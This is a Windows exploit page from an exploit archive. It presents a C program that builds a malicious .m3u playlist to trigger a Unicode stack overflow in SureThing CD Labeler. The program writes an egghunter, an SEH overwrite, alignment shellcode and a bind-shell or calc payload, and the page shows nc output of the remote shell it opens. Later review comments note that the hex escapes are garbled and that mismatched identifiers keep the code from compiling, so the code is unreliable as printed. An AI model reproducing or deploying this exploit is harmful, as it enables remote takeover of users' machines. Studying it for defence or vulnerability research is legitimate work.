
# Title : SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC Exploit
# Published : 2010-06-08
# Author : mr_me
# Previous Title : Buffer Overflow ActivePerl v5.8.8.817
# Next Title : SasCam 2.7 ActiveX Head Buffer Overflow


/*
surethingcdlabelerbofpoc.c
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SureThing cd labeler (m3u/pls) - unicode stack overflow PoC exploit
Found by: Ruben Alejandro - chap0
Author: Steven Seeley - mr_me (http://net-ninja.net/)
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
Writeup: Unicode, the magic of exploiting 0x00410041 (https://net-ninja.net/blog/?p=71)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !

Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
usage:
Compile this with lcc-win32 and execute it choosing your shellcode to create the .m3u file.
Then click on 'playlists' --> 'Import Playlist from Hard Drive' -->
'Import playlist from a file on my computer' --> for filetype select 'Generic m3u/pls file'
--> open evil m3u file --> boom.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
mrme@backtrack:~$ nc -v 192.168.2.5 4444
192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.5] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:>
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
   http://metasploit.com */

/* Payload option 1: written by main() when the user enters 1. The generator
   banner above is the only description of this blob on the page (bind shell,
   TCP 4444, alphanumeric encoder). NOTE(review): the hex escape sequences in
   this listing appear garbled by extraction; the array is reproduced
   unchanged. From a defensive viewpoint the relevant artifact is a playlist
   entry consisting of filler bytes followed by a long alphanumeric-only
   run — a normal m3u/pls entry never looks like this. */
unsigned char bind[] =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e"
"x4fx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx58"
"x4ex56x46x32x46x32x4bx38x45x44x4ex43x4bx58x4ex47"
"x45x50x4ax57x41x50x4fx4ex4bx38x4fx34x4ax41x4bx58"
"x4fx55x42x52x41x30x4bx4ex43x4ex42x53x49x54x4bx38"
"x46x53x4bx58x41x30x50x4ex41x33x42x4cx49x39x4ex4a"
"x46x58x42x4cx46x57x47x30x41x4cx4cx4cx4dx50x41x30"
"x44x4cx4bx4ex46x4fx4bx33x46x55x46x42x4ax42x45x57"
"x43x4ex4bx58x4fx55x46x52x41x50x4bx4ex48x36x4bx58"
"x4ex50x4bx34x4bx48x4fx55x4ex41x41x30x4bx4ex43x30"
"x4ex52x4bx48x49x38x4ex36x46x42x4ex41x41x56x43x4c"
"x41x43x42x4cx46x46x4bx48x42x54x42x33x4bx58x42x44"
"x4ex50x4bx38x42x47x4ex41x4dx4ax4bx48x42x54x4ax50"
"x50x35x4ax46x50x58x50x44x50x50x4ex4ex42x35x4fx4f"
"x48x4dx41x53x4bx4dx48x36x43x55x48x56x4ax36x43x33"
"x44x33x4ax56x47x47x43x47x44x33x4fx55x46x55x4fx4f"
"x42x4dx4ax56x4bx4cx4dx4ex4ex4fx4bx53x42x45x4fx4f"
"x48x4dx4fx35x49x48x45x4ex48x56x41x48x4dx4ex4ax50"
"x44x30x45x55x4cx46x44x50x4fx4fx42x4dx4ax36x49x4d"
"x49x50x45x4fx4dx4ax47x55x4fx4fx48x4dx43x45x43x45"
"x43x55x43x55x43x45x43x34x43x45x43x34x43x35x4fx4f"
"x42x4dx48x56x4ax56x41x41x4ex35x48x36x43x35x49x38"
"x41x4ex45x49x4ax46x46x4ax4cx51x42x57x47x4cx47x55"
"x4fx4fx48x4dx4cx36x42x31x41x45x45x35x4fx4fx42x4d"
"x4ax36x46x4ax4dx4ax50x42x49x4ex47x55x4fx4fx48x4d"
"x43x35x45x35x4fx4fx42x4dx4ax36x45x4ex49x44x48x38"
"x49x54x47x55x4fx4fx48x4dx42x55x46x35x46x45x45x35"
"x4fx4fx42x4dx43x49x4ax56x47x4ex49x37x48x4cx49x37"
"x47x45x4fx4fx48x4dx45x55x4fx4fx42x4dx48x36x4cx56"
"x46x46x48x36x4ax46x43x56x4dx56x49x38x45x4ex4cx56"
"x42x55x49x55x49x52x4ex4cx49x48x47x4ex4cx36x46x54"
"x49x58x44x4ex41x43x42x4cx43x4fx4cx4ax50x4fx44x54"
"x4dx32x50x4fx44x54x4ex52x43x49x4dx58x4cx47x4ax53"
"x4bx4ax4bx4ax4bx4ax4ax46x44x57x50x4fx43x4bx48x51"
"x4fx4fx45x57x46x54x4fx4fx48x4dx4bx45x47x35x44x35"
"x41x35x41x55x41x35x4cx46x41x50x41x35x41x45x45x35"
"x41x45x4fx4fx42x4dx4ax56x4dx4ax49x4dx45x30x50x4c"
"x43x35x4fx4fx48x4dx4cx56x4fx4fx4fx4fx47x33x4fx4f"
"x42x4dx4bx58x47x45x4ex4fx43x38x46x4cx46x36x4fx4f"
"x48x4dx44x55x4fx4fx42x4dx4ax36x4fx4ex50x4cx42x4e"
"x42x36x43x55x4fx4fx48x4dx4fx4fx42x4dx5a";

/* Payload option 2: written by main() when the user enters 2. Unlike `bind`,
   no generator banner is given, so encoder and size are not stated on the
   page; the menu text in main() only calls it "Calc.exe". The hex escapes
   appear garbled in this listing and are reproduced unchanged. */
unsigned char calc[] =
"xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55"
"x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c"
"x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b"
"x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49"
"x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51"
"x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50"
"x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34"
"x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51"
"x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31"
"x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50"
"x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30"
"x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c"
"x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a"
"x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a"
"x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43"
"x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45"
"x50x41x41";

// unicode encoded egghunter
// Written by main() directly after the first 8 filler bytes. It is the only
// payload on the page made purely of printable ASCII characters, which is
// consistent with the "unicode encoded" description; the `tag` array below is
// presumably the marker it searches for (main's comment calls it the
// "egghunter tag") — not verifiable from this listing.
unsigned char egghunter[] =
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ"
"1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AY"
"AZBABABABAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ44J"
"O7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA";

// venetian shellcode
// Written by main() immediately after the SEH pair; main's inline comment
// calls it "custom unicode shellcode". The name suggests it adjusts EAX and
// jumps, but only the name supports that — the bytes themselves are not
// annotated on the page. Hex escapes appear garbled in this listing and are
// reproduced unchanged.
unsigned char getAddressAndAlignEaxThenJmp[] =
"x58x6dx58x6dx58x6dx58x6dx05x02x22x6dx2dx02x11x6d"
"x2dx02x11x6dx50x6dxc3";

// Marker written by main() just before the selected payload ("egghunter tag"
// in main's comment). Eight bytes as listed; escapes reproduced unchanged.
unsigned char tag[] = "x77x30x30x74x77x30x30x74";

/*
 * Entry point. Writes the PoC playlist "cst-surethingcdlabeler.m3u" to the
 * current directory. Bytes are written in this order (see the fwrite calls
 * below): 8 filler bytes, egghunter, 62 filler bytes, NSEH, SEH,
 * getAddressAndAlignEaxThenJmp, 405 filler bytes, tag, then the payload
 * chosen interactively (1 = bind, 2 = calc; any other value writes none).
 *
 * argc/argv are unused. Returns 0. On fopen() failure the program calls
 * exit(0), so the failure path also reports success to the shell.
 *
 * Review notes (code left unchanged): the writes of nseh/seh use lowercase
 * identifiers while the declarations are NSEH/SEH, so the listing does not
 * compile as printed; fwrite/scanf/fclose results are unchecked; the
 * "x.."/"n"/"t" escapes throughout appear garbled by extraction.
 *
 * Defensive takeaway: the generated file is not a real playlist — it is a
 * long run of identical filler bytes followed by encoded code. Per the
 * title this is a stack overflow, so the importer presumably copies a
 * playlist entry into a fixed-size stack buffer without bounding its
 * length; bounding entry length at parse time is the mitigation.
 */
int main ( int argc , char * argv[])
{
    FILE* expfle = NULL;      // output file; closed after the payload write
    char* SEH = "x72x73"; // CALL DWORD PTR SS:[EBP-4] from dwwin.dll
	char* NSEH = "x41x6d";    int i; // i serves as loop counter and then as the menu choice

	// Banner.
	printf("n***************************************************************************n");
    printf("tSureThing CD Labeler Unicode stack overflow PoC Exploitn");
    printf("tFound by: Ruben Alejandro - chap0n");
	printf("tCode by: Steven Seeley - mr_men");
   	printf("thttp://www.net-ninja.net/n");
   	printf("***************************************************************************n");

    // Binary-mode output so no newline translation alters the bytes.
    // On failure the message is printed but the exit status is still 0.
    if( (expfle=fopen("cst-surethingcdlabeler.m3u","wb")) ==NULL )
    {
         perror("n[-] Cannot create the exploit file..");
         exit(0);
    }

                // Filler written one byte per fwrite call.
                for (i=0; i<8; i++)
                {
                    fwrite("x41", 1, 1, expfle); // junk
                }

                fwrite(egghunter, sizeof(egghunter)-1, 1, expfle); // egghunter

                for (i=0; i<62; i++)
                {
                    fwrite("x41", 1, 1, expfle); // junk
                }

				// SEH record (next pointer, then handler), then the custom stub.
				// NOTE(review): nseh/seh do not match the NSEH/SEH declarations above.
				fwrite(nseh, sizeof(nseh)-1, 1, expfle); // nseh - walk
				fwrite(seh, sizeof(seh)-1, 1, expfle); // seh - unicode friendly
				fwrite(getAddressAndAlignEaxThenJmp, // custom unicode shellcode
				sizeof(getAddressAndAlignEaxThenJmp)-1, 1, expfle);

				for (i=0; i<405; i++)
                {
                    fwrite("x41", 1, 1, expfle); // junk
                }

				fwrite(tag, sizeof(tag)-1, 1, expfle); // egghunter tag

				// Payload selection. scanf's result is not checked: on a
				// non-numeric answer i keeps its value from the loop above
				// (405), so neither branch fires and the file ends after tag.
				printf ("n[+] Enter shellcode option: n");
				printf ("nt1. Bindshell on port 4444");
				printf ("nt2. Calc.exen");
  				scanf ("%d",&i);

				if (i == 1){
					fwrite(bind, sizeof(bind)-1, 1, expfle); // bind
				}
				else if (i == 2){
					fwrite(calc, sizeof(calc)-1, 1, expfle); // calc
				}

                // fclose's return value is ignored, so a failed flush is
                // still reported as success below.
                fclose(expfle);
                printf("n[+] cst-surethingcdlabeler.m3u created successfully! rn");

    return 0;

}